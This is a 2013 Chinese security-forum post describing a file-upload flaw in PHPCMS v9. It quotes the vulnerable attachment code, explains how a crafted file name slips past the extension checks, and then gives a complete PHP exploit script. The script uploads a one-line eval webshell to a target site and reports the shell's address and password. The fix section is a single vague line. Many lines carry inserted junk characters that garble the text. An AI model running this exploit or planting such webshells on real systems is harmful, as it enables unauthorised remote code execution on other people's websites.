中国网络渗透测试联盟

标题: PHPCMS v9 Getshell [打印本页]

---

作者: admin    时间: 2013-3-7 13:06
标题: PHPCMS v9 Getshell
漏洞类型： 文件上传导致任意代码执行
" L8 {- j. Q) @( |4 d2 ]! m
3 a; E7 O6 V$ [9 q' y3 N+ ?; y简要描述：

. o( l& B* H( x- jphpcms v9 getshell (apache)
详细说明：

漏洞文件：phpcms\modules\attachment\attachments.php
$ C% l" u3 ?! N0 A8 g" O
/ f  x2 F9 L! B$ K- z( Vpublic function crop_upload() {  (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {  $pic = $GLOBALS["HTTP_RAW_POST_DATA"];  if (isset($_GET['width']) && !empty($_GET['width'])) {  $width = intval($_GET['width']);  }  if (isset($_GET['height']) && !empty($_GET['height'])) {  $height = intval($_GET['height']);  }  if (isset($_GET['file']) && !empty($_GET['file'])) {  $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号  if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键  if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {  $file = $_GET['file'];  $basenamebasename = basename($file);//获取带有后缀的文件名  if (strpos($basename, 'thumb_')!==false) {  $file_arr = explode('_', $basename);  $basename = array_pop($file_arr);  }  $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;  } else {  pc_base::load_sys_class('attachment','',0);  $module = trim($_GET['module']);  $catid = intval($_GET['catid']);  $siteid = $this->get_siteid();  $attachment = new attachment($module, $catid, $siteid);  $uploadedfile['filename'] = basename($_GET['file']);  $uploadedfile['fileext'] = fileext($_GET['file']);  if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {  $uploadedfile['isimage'] = 1;  }  $file_path = $this->upload_path.date('Y/md/');  pc_base::load_sys_func('dir');  dir_create($file_path);  $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];  $uploadedfile['filepath'] = date('Y/md/').$new_file;  $aid = $attachment->add($uploadedfile);  }  $filepath = date('Y/md/');  file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控  } else {  return false;  }  echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;  exit;  }  }
! N. D% E1 p" o7 Z) z后缀检测：phpcms\modules\attachment\functions\global.func.php
( n* p4 n- I! |$ w* c) h% Y
. S7 j) Y$ o- D2 A+ v

& t2 E/ a$ H+ ^( ^* z0 w( g& _function is_image($file) { 　　 $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); 　　 $ext = fileext($file);关键地方 　　 return in_array($ext,$ext_arr) ? $ext_arr :false; 　　}  
% O" t; \6 B8 ~% F* q3 F; r2 Q
关键函数:

* O- Z5 T6 F( q5 B* h; X8 z
: U' X1 K  ^9 l! c: O" {
$ n$ |! Y1 i" O4 o/ u3 Ufunction fileext($filename) {  return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }  

　　Fileext函数是对文件后缀名的提取。
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
8 P5 b. P, a2 T' e2 l1 y: z经过此函数提取到的后缀还是jpg，因此正在is_image()函数中后缀检测被绕过了。
& s' b1 d) _- u$ M2 j) }我们回到public function crop_upload() 函数中
- s7 C& D, l& u- \/ n( i4 g' u3 Vif(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
$ C" v4 E+ W! P9 p在经过了is_image的判断之后又来了个.php的判断，在此程序员使用的是strpos函数
) S3 M# I1 c+ Z' @0 z9 Q这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
. n1 ?; ?& n1 S$ Z" D4 b2 x最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀，大家应该明白了，它用在apache搭建的服务器上可以被解析。
漏洞证明：
' h( Z! \4 e2 a6 e
exp:
7 a6 k0 K* S' R  z, ?
* `" U) ]6 U; V4 D. [* V* Q2 I$ d<?php
error_reporting(E_ERROR);
6 q  i6 D8 R2 X6 }) ^* a3 d1 Qset_time_limit(0);
$pass="ln";
print_r('
9 R4 S1 D6 Z% F/ B: ?+---------------------------------------------------------------------------+
/ T. e: Z" t5 M1 x, A  \PHPCms V9 GETSHELL 0DAY
0 v7 \, w: R- M, a) O8 R2 g5 Zcode by L.N.

0 a0 Q" F, Q1 j7 R2 U( e! X2 d# _apache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
( k; |8 b. n7 K( u. ^+---------------------------------------------------------------------------+
');
. q2 C, L6 |# q6 S2 iif ($argc < 2) {
print_r('
& o( }" j; }  |- y+---------------------------------------------------------------------------+
( v9 D7 x. H1 s! K! iUsage: php '.$argv[0].' url path

Example:
$ E' [! ?2 j4 ^4 ]6 ]3 L+ {1.php '.$argv[0].' lanu.sinaapp.com
; U6 R( W  l  o  h! J( e: [2.php '.$argv[0].' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
. V4 c- X0 T$ f# i+ f; y');
exit;
! I- S- ?1 u# W% D}

$url = $argv[1];
$ P( b% l7 ^8 X: l$path = $argv[2];
* Q' P( ^' Y  Z3 e$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
* g; u* E9 e+ R5 g$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
% Y6 G+ V9 ^3 ~* K/ Gif($ret=Create_dir($url,$path))
{
//echo $ret;
2 E2 ~: I8 `) N- D% P$pattern = "|Server:[^,]+?|U";
preg_match_all($pattern, $ret, $matches);
$ ^8 G  b$ K" xif($matches[0][0])
{
if(strpos($matches[0][0],'Apache') == false)
) \) ]  O5 d  j$ [  r. L2 }{
echo "\n亲！此网站不是apache的网站。\n";exit;
}
" S+ ~6 n, f: N* S) n3 R/ p}
$ret = GetShell($url,$phpshell,$path,$file);
$pattern = "|http:\/\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
8 Y, }6 \; {* G) l# }' q' `" C* ?& n{
echo "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
: N  T. `( S9 X. P/ J' i3 ?}
4 k/ N% ~% x3 {; J% b# ?else
{
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
+ D4 N# i0 p* ?preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
$ f8 j( R0 C" \/ g5 f! g% Y  X2 f0 k" c}
else
! |1 D) c4 b+ X$ o+ ~; a{
/ Y; }4 j- _) [0 _" ]echo "\r\n没得到！\n";exit;
}
}
}

) x4 n4 X$ `( Y2 g. U4 sfunction GetShell($url,$shell,$path,$js)
{
$content =$shell;
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
7 a. r3 f* W' E6 O  [$data .= "Host: ".$url."\r\n";
0 j) p" Y1 Y# F4 T8 _$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$ V7 B/ ?$ y# ~+ @' ^  c$data .= "Connection: close\r\n";
3 N# o, k6 n' K& l  b$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 y5 d8 X) f7 U' q1 W# G$data .= $content."\r\n";
$ock=fsockopen($url,80);
if (!$ock)
{
  V: U2 B! j4 ?- w$ G$ N, m( ^& C' lecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
8 Q, D$ u9 I; u- A- d' e  Celse
{
fwrite($ock,$data);
) E  I0 R. U, G2 Z, b) Q$resp = '';
9 O) P0 w- P' p9 y9 v/ B$ ^  gwhile (!feof($ock))
6 Z% ]- m% i9 y* Z' h* l0 G, m1 L1 U{
$resp.=fread($ock, 1024);
; L; Q" m/ W) n7 L. r- X5 ?}
+ r% M$ P- d- G0 [return $resp;
/ [' D0 [1 E  O, g3 C% d! j2 q}
2 Q8 B7 R" s7 A/ A$ t8 X6 ]}
% F# ]) z/ a6 P. s1 {
function Create_dir($url,$path='')
{
$ |5 a: u+ ~8 L$content ='I love you';
* r. X) O) ]+ R  h4 {" Y. v$ U$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
5 i9 P6 l/ A; Z% L4 |$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
; o0 Y4 t/ [" z$data .= "Connection: close\r\n";
7 `; G) z8 G: S1 M' Q+ @* @6 H! i/ V$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($url,80);
& l& ~2 j: N8 ]9 f) `if (!$ock)
1 v- l+ t& c6 v- z" E2 S" u{
. S  T& }" b3 i( z; }; r6 M* iecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
fwrite($ock,$data);
$resp = '';
' h: h* ^' |+ u5 L% swhile (!feof($ock))
% \% C* {- D9 M% l{
$resp.=fread($ock, 1024);
: C( R7 f# v# i6 W! ~4 h# g" H}
( ]& }3 Q1 ], _+ ^return $resp;
}
?>
6 F( n2 w5 \3 f# V& W8 G  T
8 u& @0 s( ^1 D修复方案：

过滤过滤再过滤

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2